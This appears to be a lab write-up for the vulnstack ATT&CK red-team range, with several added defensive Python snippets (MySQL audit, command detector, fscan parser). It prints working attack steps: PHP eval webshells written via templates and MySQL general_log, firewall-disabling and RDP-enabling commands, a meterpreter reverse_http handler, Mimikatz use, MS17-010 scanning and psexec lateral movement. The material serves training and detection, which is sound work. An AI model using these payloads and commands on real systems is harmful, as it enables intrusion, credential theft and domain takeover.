ATT&CK Red Team Evaluation Practice Lab (1)

Environment setup

Environment download: http://vulnstack.qiyuanxuetang.net/vuln/detail/2/

Note: all virtual machines share the same password: hongrisec@2019

Create a new virtual network adapter vmnetX (for example vmnet2) in host-only mode, with the subnet 192.168.52.0/24

Give Win7 two network adapters: one host-only (vmnetX), the other NAT or bridged

Win2003 and Win2008 both use only (vmnetX)

Connectivity test: from Win7, ping .138 and .141

Targets:
Win7 external IP: 192.168.X.X (mine is 232.129), internal IP: 192.168.52.143
Win03 IP: 192.168.52.141
Win08 IP: 192.168.52.138

Go to phpstudy on Win7's C: drive and start the web service

Penetration

Port scan


Port 80 serves the phpStudy probe page

Next, directory scanning


We can see a backup file, phpinfo and phpmyadmin

Download the backup file; after extracting it there is a yxcms directory, whose robots.txt reads as follows

#
# robots.txt for YXCMS
#
User-agent: *
Disallow: /data
Disallow: /protected

The file data\db_back\1384692844\1384692844_part0.sql.php looks like a SQL backup

<?php exit;?>DROP TABLE IF EXISTS yx_admin
CREATE TABLE `yx_admin` ( `id` int(10) unsigned NOT NULL auto_increment, `groupid` tinyint(4) NOT NULL default '1', `username` char(10) NOT NULL, `realname` char(15) NOT NULL, `password` char(32) NOT NULL, `lastlogin_time` int(10) unsigned NOT NULL, `lastlogin_ip` char(15) NOT NULL, `iflock` tinyint(1) unsigned NOT NULL default '0', `sortpower` text NOT NULL, `extendpower` varchar(100) NOT NULL, PRIMARY KEY (`id`), UNIQUE KEY `usename` (`username`), KEY `groupid` (`groupid`)) ENGINE=MyISAM AUTO_INCREMENT=2 DEFAULT CHARSET=utf8 COMMENT='管理员信息表';
INSERT INTO yx_admin VALUES('1','1','admin','YX','168a73655bfecefdb15b14984dd2ad60','1384692085','127.0.0.1','0','','')
DROP TABLE IF EXISTS yx_extend
CREATE TABLE `yx_extend` ( `id` int(10) NOT NULL auto_increment, `pid` int(10) default '0', `tableinfo` varchar(255) default NULL, `type` int(4) default '0', `defvalue` varchar(255) default NULL, `name` varchar(255) default NULL, `norder` int(5) NOT NULL default '0', `ifsearch` tinyint(1) NOT NULL, PRIMARY KEY (`id`)) ENGINE=MyISAM AUTO_INCREMENT=18 DEFAULT CHARSET=utf8;
INSERT INTO yx_extend VALUES('1','0','extend_product','0','','产品拓展','0','0')
INSERT INTO yx_extend VALUES('2','1','stand','1','未知','产品型号','0','0')
.................
.................
.................

Looking up that MD5 hash gives 949ba59abbe56e05, which seems rather long... not sure whether it is correct

Logging in with that does not seem to work; there is a notice on the home page, and the credentials in it log in directly

This site is the default demo template of YXcms. YXcms is an efficient website management system built on PHP+MySQL. To reach the admin panel, append /index.php?r=admin to the site URL. Admin username: admin; password: 123456; please change the default password after logging in.

According to the backup file, the template directory is yxcms\protected\apps\default\view\default

Create a new template containing a one-line webshell and connect to it with a webshell client (actually browsing http://192.168.232.129/yxcms/protected/apps/default/view/default/ shows there is a directory-listing vulnerability as well)

The database uses the weak credentials root/root; let's see whether a file can be written directly

SELECT '<?php @eval($_POST[cmd]);?>' into outfile 'C:/phpStudy/WWW/test.php'

Error:

#1290 - The MySQL server is running with the --secure-file-priv option so it cannot execute this statement

We can query the global variables for this

SHOW GLOBAL VARIABLES LIKE '%secure%'

secure_file_priv is NULL, so writing is not possible; moreover it is read-only and cannot be changed at runtime

Alternatively, try writing through the query log

This is off by default; we turn it on

SET GLOBAL general_log = ON
SET GLOBAL general_log_file = 'C:/phpStudy/WWW/666.php'

Then run the query Select '<?php @eval($_POST[666]);?>' and connect with the webshell client
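An added example, not from the original post: a small audit of the MySQL settings involved here, so a defender can check whether secure_file_priv or a redirected general_log exposes the web root. The `SHOW GLOBAL VARIABLES` sample is constructed and the web root path is assumed from the post's paths.

```python
"""Audit MySQL for the file-write paths used in the post.

Added example, not from the original post. It parses `SHOW GLOBAL VARIABLES`
output from the mysql client and reports the two conditions that let anyone
with SQL access drop a file under the web root: an empty secure_file_priv
(INTO OUTFILE allowed anywhere) or the general query log redirected into a
web-served path. Sample output below is constructed for the lab host.
"""

# Constructed: what `SHOW GLOBAL VARIABLES` prints once the log has been
# redirected as in the post (secure_file_priv itself is still NULL).
SAMPLE_VARIABLES = """\
Variable_name\tValue
secure_file_priv\tNULL
general_log\tON
general_log_file\tC:/phpStudy/WWW/666.php
log_output\tFILE
datadir\tC:/phpStudy/MySQL/data/
"""

# Directories served over HTTP on this host (assumed from the post's paths).
WEB_ROOTS = ("C:/phpStudy/WWW",)
SCRIPT_EXTS = (".php", ".phtml", ".asp", ".aspx", ".jsp")


def parse_variables(text):
    """Turn the mysql client's tab-separated table into a dict."""
    rows = (line.split("\t", 1) for line in text.splitlines()[1:] if "\t" in line)
    return {name: value for name, value in rows}


def under_web_root(path):
    """True when the (Windows or POSIX) path lies inside a served directory."""
    p = path.replace("\\", "/").lower()
    return any(p.startswith(root.lower().rstrip("/") + "/") for root in WEB_ROOTS)


def audit(variables):
    """Return (severity, message) tuples for settings that enable file drops."""
    findings = []
    sfp = variables.get("secure_file_priv", "NULL")
    if sfp == "":
        findings.append(("HIGH", "secure_file_priv is empty: INTO OUTFILE may write anywhere"))
    elif sfp != "NULL" and under_web_root(sfp):
        findings.append(("HIGH", f"secure_file_priv allows writes inside the web root: {sfp}"))
    log_on = variables.get("general_log", "OFF").upper() == "ON"
    log_file = variables.get("general_log_file", "")
    if log_on and "FILE" in variables.get("log_output", "FILE").upper():
        if under_web_root(log_file):
            findings.append(("CRITICAL", f"general_log writes into the web root: {log_file}"))
        elif log_file.lower().endswith(SCRIPT_EXTS):
            findings.append(("CRITICAL", f"general_log file has a script extension: {log_file}"))
        else:
            findings.append(("INFO", "general_log is ON; every query, payloads included, is written to disk"))
    return findings
```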

Host information gathering

Open a virtual terminal: the user is administrator, and there is also an internal IP, 192.168.52.143


System and patch information (system type: x64-based PC)

C:\phpStudy\WWW> systeminfo
主机名: STU1
OS 名称: Microsoft Windows 7 专业版
OS 版本: 6.1.7601 Service Pack 1 Build 7601
OS 制造商: Microsoft Corporation
OS 配置: 成员工作站
OS 构件类型: Multiprocessor Free
注册的所有人: Windows 用户
注册的组织:
产品 ID: 00371-177-0000061-85693
初始安装日期: 2019/8/25, 9:54:10
系统启动时间: 2024/8/20, 14:53:01
系统制造商: VMware, Inc.
系统型号: VMware Virtual Platform
系统类型: x64-based PC
处理器: 安装了 1 个处理器。
[01]: AMD64 Family 25 Model 80 Stepping 0 AuthenticAMD ~3194 Mhz
BIOS 版本: Phoenix Technologies LTD 6.00, 2020/11/12
Windows 目录: C:\Windows
系统目录: C:\Windows\system32
启动设备: \Device\HarddiskVolume1
系统区域设置: zh-cn;中文(中国)
输入法区域设置: zh-cn;中文(中国)
时区: (UTC+08:00)北京,重庆,香港特别行政区,乌鲁木齐
物理内存总量: 2,047 MB
可用的物理内存: 1,258 MB
虚拟内存: 最大值: 4,095 MB
虚拟内存: 可用: 3,213 MB
虚拟内存: 使用中: 882 MB
页面文件位置: C:\pagefile.sys
域: god.org
登录服务器: \\OWA
修补程序: 安装了 4 个修补程序。
[01]: KB2534111
[02]: KB2999226
[03]: KB958488
[04]: KB976902
网卡: 安装了 5 个 NIC。
[01]: Intel(R) PRO/1000 MT Network Connection
连接名: 本地连接
启用 DHCP: 否
IP 地址
[01]: 192.168.52.143
[02]: fe80::15ce:507f:6840:5c62
[02]: TAP-Windows Adapter V9
连接名: 本地连接 2
状态: 媒体连接已中断
[03]: Microsoft Loopback Adapter
连接名: Npcap Loopback Adapter
启用 DHCP: 是
DHCP 服务器: 255.255.255.255
IP 地址
[01]: 169.254.129.186
[02]: fe80::b461:ccad:e30f:81ba
[04]: TAP-Windows Adapter V9
连接名: 本地连接 3
状态: 媒体连接已中断
[05]: Intel(R) PRO/1000 MT Network Connection
连接名: 本地连接 5
启用 DHCP: 是
DHCP 服务器: 192.168.232.254
IP 地址
[01]: 192.168.232.129
[02]: fe80::ed80:3750:5fdb:1c0d

CS beacon check-in


Running Mimikatz yields the password


Right-click and use elevate to escalate privileges directly

The elevate command in Cobalt Strike is used to escalate privileges, and svc-exe is one of its methods. svc-exe relies on a property of Windows services: if a service runs with SYSTEM privileges, a program started through that service also runs as SYSTEM. The general steps and principle of svc-exe escalation are:

  1. Create a program that is started with SYSTEM privileges: its job is to connect to a specified named pipe.
  2. Create a process that creates the named pipe.
  3. Interact through the pipe: have the SYSTEM program start and connect to that named pipe.
  4. Use the ImpersonateNamedPipeClient function to obtain a SYSTEM token.
  5. Use the SYSTEM token to start a program, for example cmd.exe, and thereby obtain a SYSTEM shell.

When svc-exe escalation is used in Cobalt Strike, an executable that starts as a service is generated on the target; it responds to Service Control Manager commands. After successful escalation it connects back to the specified listener as SYSTEM, and a new session appears on the Cobalt Strike team server.

Note that svc-exe escalation must be run from an existing session, and that session needs enough privilege to create services and write files. In addition, the method may depend on specific service configuration or vulnerabilities on the target in order to succeed; if the target is patched or properly configured, it may fail.

ipconfig /all shows the domain is god.org


net config workstation shows the current computer name, user name, OS version, domain and so on

net view /domain lists the domains (sometimes there are several); here there is only one, GOD


CS domain member query, to confirm the domain controller (PDC: primary domain controller, the computer running Windows NT Server that validates domain logons and maintains the domain directory database); however the IP address shown by CS is incorrect.


Enable 3389

Enable port 3389 via the registry
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f


Disable the firewall
netsh firewall set opmode disable #Windows Server 2003 and earlier
netsh advfirewall set allprofiles state off #after Windows Server 2003
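As an added example (not from the original post), here is the detection a defender would run over process-creation telemetry (Sysmon Event ID 1 or Security 4688 style records) for exactly these two host changes: the fDenyTSConnections registry write and the netsh firewall disable. The event records are constructed; the first two are the post's own commands.

```python
"""Flag command lines that open RDP or disable the host firewall.

Added example, not part of the original post. Process-creation records are
modelled as dicts (constructed below). The rules tolerate the `Terminal" "Server`
quoting trick by stripping quotes before matching.
"""
import re

# Each rule: (technique label, regex applied to the normalised command line)
RULES = [
    ("rdp_enabled_via_registry",
     re.compile(r"\breg(?:\.exe)?\s+add\b.*terminal\s*server.*fdenytsconnections.*/d\s+0+\b", re.I)),
    ("firewall_disabled_legacy_netsh",
     re.compile(r"\bnetsh(?:\.exe)?\s+firewall\s+set\s+opmode\s+(?:mode=)?disable\b", re.I)),
    ("firewall_disabled_advfirewall",
     re.compile(r"\bnetsh(?:\.exe)?\s+advfirewall\s+set\s+\w+profile[s]?\s+state\s+off\b", re.I)),
]

# Constructed sample events; events 3 and 4 are benign look-alikes (a query,
# and an administrator re-disabling RDP with /d 1) that must not alert.
SAMPLE_EVENTS = [
    {"host": "STU1", "user": "NT AUTHORITY\\SYSTEM", "parent": "rundll32.exe",
     "cmd": 'REG ADD HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f'},
    {"host": "STU1", "user": "NT AUTHORITY\\SYSTEM", "parent": "rundll32.exe",
     "cmd": "netsh advfirewall set allprofiles state off"},
    {"host": "STU1", "user": "GOD\\administrator", "parent": "explorer.exe",
     "cmd": "netsh advfirewall show allprofiles"},
    {"host": "OWA", "user": "GOD\\Administrator", "parent": "cmd.exe",
     "cmd": 'reg add "HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 1 /f'},
    {"host": "ROOT-TVI862UBEH", "user": "GOD\\Administrator", "parent": "cmd.exe",
     "cmd": "netsh firewall set opmode disable"},
]


def normalise(cmd):
    """Drop quotes (defeats the `"..." "..."` split trick) and collapse whitespace."""
    return re.sub(r"\s+", " ", cmd.replace('"', ""))


def detect(events):
    """Return one alert dict per (event, matching rule), in event order."""
    alerts = []
    for ev in events:
        flat = normalise(ev["cmd"])
        for label, rx in RULES:
            if rx.search(flat):
                alerts.append({"host": ev["host"], "user": ev["user"],
                               "parent": ev["parent"], "technique": label, "cmd": ev["cmd"]})
    return alerts
```

A SYSTEM-level beacon spawning these from rundll32.exe, as in the sample, is the combination worth paging on: parent process plus user plus technique.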

fscan internal network scan


Detailed scan results:

We can see that 143 has MS17-010; that can be used for privilege escalation

192.168.52.138:80 open
192.168.52.141:21 open
192.168.52.141:135 open
192.168.52.143:135 open
192.168.52.1:135 open
192.168.52.138:135 open
192.168.52.143:80 open
192.168.52.141:7001 open
192.168.52.143:3306 open
192.168.52.141:445 open
192.168.52.143:445 open
192.168.52.1:445 open
192.168.52.138:445 open
192.168.52.141:139 open
192.168.52.143:139 open
192.168.52.1:139 open
192.168.52.138:139 open
192.168.52.138:88 open
192.168.52.141:7002 open
192.168.52.1:8088 open
192.168.52.1:8161 open
192.168.52.141:8099 open
192.168.52.141:8098 open
192.168.52.1:8099 open
192.168.52.1:8098 open
192.168.52.1:8834 open
[+] 192.168.52.143 MS17-010 (Windows 7 Professional 7601 Service Pack 1)
[+] NetInfo:
[*]192.168.52.143
[->]stu1
[->]192.168.52.143
[->]169.254.129.186
[->]192.168.232.129
[*] 192.168.52.143 GOD\STU1 Windows 7 Professional 7601 Service Pack 1
[*] 192.168.52.141 __MSBROWSE__\SNTL_ROOT-TVI86
[+] NetInfo:
[*]192.168.52.141
[->]root-tvi862ubeh
[->]192.168.52.141
[+] NetInfo:
[*]192.168.52.138
[->]owa
[->]192.168.52.138
[+] NetInfo:
[*]192.168.52.1
[->]LAPTOP-QLSFIGJ9
[->]192.168.232.1
[->]192.168.108.1
[->]192.168.52.1
[->]192.168.1.227
[->]fdd7:e884:25e6:0:a568:4b3d:d112:3b74
[->]fdd7:e884:25e6:0:f4f2:819e:993f:1aab
[*] 192.168.52.1 WORKGROUP\LAPTOP-QLSFIGJ9
[*] WebTitle:http://192.168.52.141:7002 code:200 len:2632 title:Sentinel Keys License Monitor
[+] 192.168.52.141 MS17-010 (Windows Server 2003 3790)
[*] WebTitle:https://192.168.52.1:8834 code:200 len:1629 title:Nessus
[*] WebTitle:http://192.168.52.1:8161 code:302 len:0 title:None 跳转url: http://192.168.52.1:8161/index.html
[*] 192.168.52.138 [+]DC GOD\OWA Windows Server 2008 R2 Datacenter 7601 Service Pack 1
[+] 192.168.52.138 MS17-010 (Windows Server 2008 R2 Datacenter 7601 Service Pack 1)
[*] WebTitle:http://192.168.52.141:8099 code:403 len:1409 title:The page must be viewed over a secure channel
[*] WebTitle:https://192.168.52.141:8098 code:401 len:1656 title:You are not authorized to view this page
[*] WebTitle:http://192.168.52.1:8161/index.html code:200 len:6180 title:Apache ActiveMQ
[+] InfoScan:http://192.168.52.1:8161/index.html [activemq]
[*] WebTitle:http://192.168.52.138 code:200 len:689 title:IIS7
[*] WebTitle:https://192.168.52.1:8088 code:200 len:14 title:None
[*] WebTitle:http://192.168.52.143 code:200 len:14749 title:phpStudy 探针 2014
[+] ftp://192.168.52.141:21:anonymous
[*] WebTitle:http://192.168.52.1:8099 code:403 len:48 title:None
[+] http://192.168.52.1:8161 poc-yaml-activemq-default-password
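An added example, not from the original post or from fscan itself: a parser that turns this output into a per-host summary and ranks hosts for triage (domain controller first, then hosts with exploitable findings). The embedded input is a constructed excerpt of the scan above.

```python
"""Triage fscan output into a per-host summary.

Added example, not part of the original post or of fscan. It parses the line
shapes fscan printed above (`ip:port open`, `[*] ip [+]DC DOMAIN\\HOST os`,
`[+] ip MS17-010 (...)`, WebTitle, anonymous ftp, poc-yaml hits) and ranks hosts
so the domain controller and exploitable hosts come first. Input is constructed.
"""
import re
from collections import defaultdict

SAMPLE_FSCAN = """\
192.168.52.138:80 open
192.168.52.141:21 open
192.168.52.141:445 open
192.168.52.143:445 open
[+] 192.168.52.143 MS17-010 (Windows 7 Professional 7601 Service Pack 1)
[*] 192.168.52.143 GOD\\STU1 Windows 7 Professional 7601 Service Pack 1
[*] WebTitle:http://192.168.52.141:7002 code:200 len:2632 title:Sentinel Keys License Monitor
[+] 192.168.52.141 MS17-010 (Windows Server 2003 3790)
[*] 192.168.52.138 [+]DC GOD\\OWA Windows Server 2008 R2 Datacenter 7601 Service Pack 1
[+] 192.168.52.138 MS17-010 (Windows Server 2008 R2 Datacenter 7601 Service Pack 1)
[+] ftp://192.168.52.141:21:anonymous
[+] http://192.168.52.1:8161 poc-yaml-activemq-default-password
"""

IP = r"(\d{1,3}(?:\.\d{1,3}){3})"
RX_PORT = re.compile(rf"^{IP}:(\d+) open$")
RX_VULN = re.compile(rf"^\[\+\] {IP} (MS\d{{2}}-\d{{3}}) \((.*)\)$")
RX_HOST = re.compile(rf"^\[\*\] {IP} (\[\+\]DC )?(\S+\\\S+)(?: (.*))?$")
RX_WEB = re.compile(rf"^\[\*\] WebTitle:(\w+)://{IP}(?::(\d+))? code:(\d+) len:\d+ title:(.*)$")
RX_FTP = re.compile(rf"^\[\+\] ftp://{IP}:(\d+):anonymous$")
RX_POC = re.compile(rf"^\[\+\] \w+://{IP}\S* (poc-yaml-\S+)$")


def parse_fscan(text):
    """Return {ip: {"ports", "name", "os", "dc", "findings"}} from fscan output."""
    hosts = defaultdict(lambda: {"ports": set(), "name": "", "os": "", "dc": False, "findings": []})
    for line in text.splitlines():
        if m := RX_PORT.match(line):            # ip:port open
            hosts[m[1]]["ports"].add(int(m[2]))
        elif m := RX_VULN.match(line):          # [+] ip MS17-010 (os)
            hosts[m[1]]["findings"].append(f"{m[2]}: {m[3]}")
        elif m := RX_HOST.match(line):          # [*] ip [+]DC DOMAIN\HOST os
            h = hosts[m[1]]
            h["dc"], h["name"], h["os"] = bool(m[2]), m[3], m[4] or ""
        elif m := RX_WEB.match(line):           # [*] WebTitle:scheme://ip:port ...
            hosts[m[2]]["findings"].append(f"web {m[1]}:{m[3] or '80'} {m[4]} {m[5]}")
        elif m := RX_FTP.match(line):           # [+] ftp://ip:port:anonymous
            hosts[m[1]]["findings"].append(f"anonymous ftp on {m[2]}")
        elif m := RX_POC.match(line):           # [+] url poc-yaml-...
            hosts[m[1]]["findings"].append(m[2])
    return dict(hosts)


def rank(hosts):
    """Order hosts: domain controller first, then most exploitable findings, then IP."""
    def key(item):
        ip, h = item
        exploitable = sum(f.startswith(("MS", "poc-yaml", "anonymous")) for f in h["findings"])
        return (not h["dc"], -exploitable, ip)
    return [ip for ip, _ in sorted(hosts.items(), key=key)]
```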

Ladon also works

[08/26 14:15:03] [*] Ladon 192.168.52.1/24 OnlineIP
[08/26 14:15:04] [+] host called home, sent: 496219 bytes
[08/26 14:15:05] [+] received output:
Ladon 9.1.1
Start: 2024-08-26 14:15:05
Runtime: .net 4.0 ME: x64 OS: x64
OS Name: Microsoft Windows 7 专业版
Machine Make: VMware, Inc.
RunUser: Administrator PR: *IsAdmin
Priv: SeImpersonatePrivilege 已启用
PID: 2452 CurrentProcess: rundll32
FreeSpace: Disk C:\ 6563 MB

load OnlineIP
192.168.52.1/24 is Valid CIDR
IPCound: 256
Scan Start: 2024-08-26 14:15:05
192.168.52.1

[08/26 14:15:28] [+] received output:
192.168.52.138
192.168.52.141
192.168.52.143

[08/26 14:16:04] [+] received output:
=============================================
OnlinePC:4
Cidr Scan Finished!
End: 2024-08-26 14:16:04

The OSScan function detects the OS version and whether the host is a virtual machine

[08/26 14:20:16] [*] Tasked beacon to run .NET program: Ladon.exe 192.168.52.0/24 OSScan
[08/26 14:20:21] [+] host called home, sent: 1036887 bytes
[08/26 14:20:22] [+] received output:
Ladon 7.5
Start: 2024-08-26 14:20:22
Runtime: .net 4.0 ME: x64 OS: x64
OS Name: Microsoft Windows 7 专业版
RunUser: SYSTEM PR: *IsSystem
Priv: SeImpersonatePrivilege 已启用
PID: 2312 CurrentProcess: rundll32

load OsScan
IP Mac Domain/HostName OSversion/Service Vendor
192.168.52.0/24 is Valid CIDR
IPCound: 256
Scan Start: 2024-08-26 14:20:22

[08/26 14:20:31] [+] received output:
192.168.52.1 00-50-56-C0-00-02 WORKGROUP\LAPTOP-QLSFIGJ9 [Win Netbios Name] VMware

[08/26 14:20:40] [+] received output:
192.168.52.143 00-0C-29-B4-9F-EF god.org\STU1 [Win 7 Professional 7601 SP 1] VMware
192.168.52.138 00-0C-29-2C-84-78 god.org\OWA [Win 2008 R2 Datacenter 7601 SP 1] VMware
192.168.52.141 00-0C-29-23-21-64 god.org\ROOT-TVI862UBEH [Win 2003 3790] VMware

MSF integration

Create a new windows/foreign/reverse_http listener

In msf enter

use exploit/multi/handler
set payload windows/meterpreter/reverse_http (the same payload chosen in CS)
set lhost <local IP>
set lport 9999
exploit

In CS spawn a new session and choose the msf listener

Add routes

meterpreter > run post/multi/manage/autoroute 

[*] Running module against STU1
[*] Searching for subnets to autoroute.
[+] Route added to subnet 192.168.52.0/255.255.255.0 from host's routing table.
[+] Route added to subnet 192.168.232.0/255.255.255.0 from host's routing table.
meterpreter > run autoroute -p

[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]

Active Routing Table
====================

Subnet Netmask Gateway
------ ------- -------
192.168.52.0 255.255.255.0 Session 1
192.168.232.0 255.255.255.0 Session 1

ARP host discovery

msf6 exploit(multi/handler) > use post/windows/gather/arp_scanner 
msf6 post(windows/gather/arp_scanner) > show options

Module options (post/windows/gather/arp_scanner):

Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target address range or CIDR identifier
SESSION yes The session to run this module on
THREADS 10 no The number of concurrent threads


View the full module info with the info, or info -d command.

msf6 post(windows/gather/arp_scanner) > sessions

Active sessions
===============

Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x86/windows NT AUTHORITY\SYSTEM @ STU1 192.168.232.130:9999 -> 192.168.2
32.129:62110 (192.168.232.129)

msf6 post(windows/gather/arp_scanner) > set session 1
session => 1
msf6 post(windows/gather/arp_scanner) > set RHOSTS 192.168.52.1/24
RHOSTS => 192.168.52.1/24
msf6 post(windows/gather/arp_scanner) > run

[*] Running module against STU1
[*] ARP Scanning 192.168.52.1/24
[+] IP: 192.168.52.1 MAC 00:50:56:c0:00:02 (VMware, Inc.)
[+] IP: 192.168.52.138 MAC 00:0c:29:2c:84:78 (VMware, Inc.)
[+] IP: 192.168.52.143 MAC 00:0c:29:b4:9f:ef (VMware, Inc.)
[+] IP: 192.168.52.141 MAC 00:0c:29:23:21:64 (VMware, Inc.)
[+] IP: 192.168.52.255 MAC 00:0c:29:b4:9f:ef (VMware, Inc.)
[+] IP: 192.168.52.254 MAC 00:50:56:e7:ae:61 (VMware, Inc.)
[*] Post module execution completed

UDP host discovery

msf6 post(windows/gather/arp_scanner) > use auxiliary/scanner/discovery/udp_sweep
msf6 auxiliary(scanner/discovery/udp_sweep) > show options

Module options (auxiliary/scanner/discovery/udp_sweep):

Name Current Setting Required Description
---- --------------- -------- -----------
BATCHSIZE 256 yes The number of hosts to probe in each set
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/
using-metasploit/basics/using-metasploit.html
THREADS 10 yes The number of concurrent threads


View the full module info with the info, or info -d command.

msf6 auxiliary(scanner/discovery/udp_sweep) > set RHOSTS 192.168.52.1/24
RHOSTS => 192.168.52.1/24
msf6 auxiliary(scanner/discovery/udp_sweep) > run

[*] Sending 13 probes to 192.168.52.0->192.168.52.255 (256 hosts)
[*] Discovered NetBIOS on 192.168.52.1:137 (LAPTOP-QLSFIGJ9:<20>:U :WORKGROUP:<00>:G :LAPTOP-QLSFIGJ9:<00>:U :00:50:56:c0:00:02)
[*] Discovered NetBIOS on 192.168.52.138:137 (OWA:<00>:U :GOD:<00>:G :GOD:<1c>:G :OWA:<20>:U :GOD:<1b>:U :00:0c:29:2c:84:78)
[*] Discovered DNS on 192.168.52.138:53 (Microsoft DNS)
[*] Discovered NTP on 192.168.52.138:123 (1c0104fa00000000000a16cf4c4f434cea77a7f77836778bc54f234b71b152f3ea77c0c61d552fddea77c0c61d552fdd)
[*] Discovered NetBIOS on 192.168.52.141:137 (ROOT-TVI862UBEH:<00>:U :GOD:<00>:G :SNTL_ROOT-TVI86:<32>:U :ROOT-TVI862UBEH:<20>:U :GOD:<1e>:G :GOD:<1d>:U :__MSBROWSE__:<01>:G :00:0c:29:23:21:64)
[*] Discovered NetBIOS on 192.168.52.143:137 (STU1:<00>:U :GOD:<00>:G :STU1:<20>:U :00:0c:29:b4:9f:ef)
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed

Start a SOCKS proxy with msf

use auxiliary/server/socks_proxy
run

Edit /etc/proxychains4.conf

└─$ tail /etc/proxychains4.conf 
# proxy types: http, socks4, socks5, raw
# * raw: The traffic is simply forwarded to the proxy without modification.
# ( auth types supported: "basic"-http "user/pass"-socks )
#
[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
socks5 127.0.0.1 1080

Scan with nmap (the results for 52.141 are omitted)

$ proxychains nmap -T4 -A -v -Pn 192.168.52.138
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-26 23:12 EDT
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 23:12
Completed NSE at 23:12, 0.00s elapsed
Initiating NSE at 23:12
Completed NSE at 23:12, 0.00s elapsed
Initiating NSE at 23:12
Completed NSE at 23:12, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 23:12
Completed Parallel DNS resolution of 1 host. at 23:12, 0.01s elapsed
Initiating SYN Stealth Scan at 23:12
Scanning 192.168.52.138 [1000 ports]
Discovered open port 135/tcp on 192.168.52.138
Discovered open port 53/tcp on 192.168.52.138
Discovered open port 80/tcp on 192.168.52.138
Discovered open port 445/tcp on 192.168.52.138
Discovered open port 139/tcp on 192.168.52.138
Discovered open port 49158/tcp on 192.168.52.138
Discovered open port 464/tcp on 192.168.52.138
Discovered open port 88/tcp on 192.168.52.138
Discovered open port 49161/tcp on 192.168.52.138
Discovered open port 49157/tcp on 192.168.52.138
Discovered open port 49167/tcp on 192.168.52.138
Discovered open port 3268/tcp on 192.168.52.138
Discovered open port 389/tcp on 192.168.52.138
Discovered open port 593/tcp on 192.168.52.138
Discovered open port 3269/tcp on 192.168.52.138
Completed SYN Stealth Scan at 23:12, 4.47s elapsed (1000 total ports)
Initiating Service scan at 23:12
Scanning 15 services on 192.168.52.138
Completed Service scan at 23:12, 5.01s elapsed (15 services on 1 host)
Initiating OS detection (try #1) against 192.168.52.138
Retrying OS detection (try #2) against 192.168.52.138
Initiating Traceroute at 23:12
Completed Traceroute at 23:12, 9.10s elapsed
NSE: Script scanning 192.168.52.138.
Initiating NSE at 23:12
Completed NSE at 23:13, 27.96s elapsed
Initiating NSE at 23:13
Completed NSE at 23:13, 0.55s elapsed
Initiating NSE at 23:13
Completed NSE at 23:13, 0.00s elapsed
Nmap scan report for 192.168.52.138
Host is up (0.0011s latency).
Not shown: 985 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open tcpwrapped
80/tcp open tcpwrapped
|_http-server-header: Microsoft-IIS/7.5
88/tcp open tcpwrapped
135/tcp open tcpwrapped
139/tcp open tcpwrapped
389/tcp open tcpwrapped
445/tcp open tcpwrapped
464/tcp open tcpwrapped
593/tcp open tcpwrapped
3268/tcp open tcpwrapped
3269/tcp open tcpwrapped
49157/tcp open tcpwrapped
49158/tcp open tcpwrapped
49161/tcp open tcpwrapped
49167/tcp open tcpwrapped
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host

Host script results:
|_smb2-time: Protocol negotiation failed (SMB2)

TRACEROUTE (using port 135/tcp)
HOP RTT ADDRESS
1 ... 30

NSE: Script Post-scanning.
Initiating NSE at 23:13
Completed NSE at 23:13, 0.00s elapsed
Initiating NSE at 23:13
Completed NSE at 23:13, 0.00s elapsed
Initiating NSE at 23:13
Completed NSE at 23:13, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 54.63 seconds
Raw packets sent: 2223 (103.828KB) | Rcvd: 2402 (114.170KB)

Port 445 is open, so MS17-010 (EternalBlue) can be tried; it can also be scanned for first

msf6 auxiliary(scanner/smb/smb_ms17_010) > use auxiliary/scanner/smb/smb_ms17_010
msf6 auxiliary(scanner/smb/smb_ms17_010) > set RHOST 192.168.52.138
RHOST => 192.168.52.138
msf6 auxiliary(scanner/smb/smb_ms17_010) > run

[+] 192.168.52.138:445 - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Datacenter 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.52.138:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/smb/smb_ms17_010) > set RHOST 192.168.52.141
RHOST => 192.168.52.141
msf6 auxiliary(scanner/smb/smb_ms17_010) > run

[+] 192.168.52.141:445 - Host is likely VULNERABLE to MS17-010! - Windows Server 2003 3790 x86 (32-bit)
[*] 192.168.52.141:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

The admin/smb/ms17_010_command module can execute commands directly; the EternalBlue exploit module only supports 64-bit systems

CS lateral movement

52.141 was taken via psexec

while 52.138 was taken via psexec_psh

References

http://vulnstack.qiyuanxuetang.net/vuln/detail/2/
https://www.cnblogs.com/yokan/p/14021537.html
https://blog.csdn.net/weixin_39190897/article/details/118353886
https://www.cnblogs.com/1vxyz/p/17201316.html
https://xz.aliyun.com/t/14336
https://www.freebuf.com/column/231111.html
